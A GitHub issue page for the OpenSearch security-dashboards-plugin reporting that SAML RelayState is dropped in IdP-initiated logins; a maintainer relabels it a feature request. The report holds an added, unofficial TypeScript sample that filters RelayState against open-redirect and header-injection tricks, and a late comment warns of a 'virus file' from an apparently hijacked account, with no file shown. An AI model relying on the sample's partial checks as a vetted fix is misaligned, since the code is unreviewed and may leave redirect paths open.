opensearch-project / security-dashboards-plugin

🔐 Manage your internal users, roles, access control, and audit logs from OpenSearch Dashboards
https://opensearch.org/docs/latest/security-plugin/index/
Apache License 2.0

[FEATURE] Not Maintaining Relay State During IDP Initiated SAML Flow #2103

Open ogi28 opened 2 months ago

ogi28 commented 2 months ago

What is the bug? When using an IDP Initiated SAML Flow with OpenSearch Dashboards, the RelayState provided by the IDP is dropped after authentication. As a result, the user is always redirected to the default entry page instead of the specific dashboard or URL specified in the RelayState.

How can one reproduce the bug?

Steps to reproduce the behavior:

1. Configure OpenSearch Dashboards with SAML authentication using an Identity Provider (IDP).
2. Initiate a SAML flow from the IDP with a specific RelayState that points to a particular dashboard or URL.
3. Complete the authentication process in OpenSearch Dashboards.
4. Observe that the user is redirected to the default entry page instead of the URL specified in the RelayState.

What is the expected behavior? After successful authentication, the user should be redirected to the URL specified in the RelayState, allowing dynamic redirection to specific dashboards or URLs.

What is your host/environment?

- OS: Tried Docker and tarball install
- OpenSearch Dashboards Version: 2.15
- OpenSearch Version: 2.15
- Plugins: Default ones

Do you have any screenshots? No

Do you have any additional context? This issue impacts workflows that rely on dynamic redirection post-authentication, such as directing users to specific dashboards based on the RelayState. Any guidance on whether this behavior is expected or if there are plans to address this would be appreciated.
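As an added example (not the plugin's code; the plugin does not currently honour RelayState), here is how an ACS handler could apply the RelayState from the IdP's POST and otherwise fall back to the tenant's default route. The base path and default route are assumed inputs, and only same-application paths are accepted so that an IdP- or attacker-controlled RelayState cannot turn the login into an open redirect.

```typescript
// Added example, not code from security-dashboards-plugin. Models the decision
// an ACS (assertion consumer) handler makes after an IdP-initiated login.

// Minimal application/x-www-form-urlencoded decoder for the ACS POST body.
export function formField(body: string, name: string): string | undefined {
  for (const pair of body.split('&')) {
    const eq = pair.indexOf('=');
    const rawKey = eq < 0 ? pair : pair.slice(0, eq);
    if (decodeURIComponent(rawKey.replace(/\+/g, ' ')) === name) {
      const rawVal = eq < 0 ? '' : pair.slice(eq + 1);
      return decodeURIComponent(rawVal.replace(/\+/g, ' '));
    }
  }
  return undefined;
}

// Accept only paths inside the Dashboards base path. A value starting with '/'
// cannot carry a scheme, so the remaining dangers are protocol-relative
// ('//host'), the backslash variant ('/\host', which browsers normalise to
// '//host') and CR/LF that could inject response headers.
export function isSafeRelayState(relayState: string, basePath: string): boolean {
  if (relayState.indexOf('/') !== 0) return false;
  if (relayState.indexOf('//') === 0 || relayState.indexOf('/\\') === 0) return false;
  if (/[\r\n]/.test(relayState)) return false;
  const path = relayState.split(/[?#]/, 1)[0]; // strip query and fragment
  const base = basePath.replace(/\/$/, '');
  return base === '' || path === base || path.indexOf(base + '/') === 0;
}

// Honour RelayState when safe, else send the user to the tenant default route.
export function chooseRedirect(
  relayState: string | undefined,
  basePath: string,
  tenantDefaultRoute: string,
): { target: string; source: 'relayState' | 'defaultRoute' } {
  if (relayState && isSafeRelayState(relayState, basePath)) {
    return { target: relayState, source: 'relayState' };
  }
  const base = basePath.replace(/\/$/, '');
  const route = tenantDefaultRoute.indexOf('/') === 0 ? tenantDefaultRoute : '/' + tenantDefaultRoute;
  return { target: base + route, source: 'defaultRoute' };
}

// Constructed ACS POST body as an IdP would send it; SAMLResponse is a
// placeholder, not a real assertion.
export const SAMPLE_ACS_BODY =
  'SAMLResponse=PLACEHOLDER_BASE64&RelayState=%2Fapp%2Fdashboards%23%2Fview%2Fabc123';
```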


cwperks commented 2 months ago

[Triage] Thank you for filing this issue @ogi28 . I updated the description to mark this as a feature request since this is not currently supported in the security-dashboards-plugin.

There is a feature in advanced settings called default route which can be set on a tenant basis to log users of that tenant into the configured route, but there is no support for RelayState at the moment.

MinecraftEarthVillage commented 2 weeks ago


Don't download the file I sent some time ago. It wasn't me; another person was controlling me. If you use this virus file, you will also be controlled and will forward this virus crazily.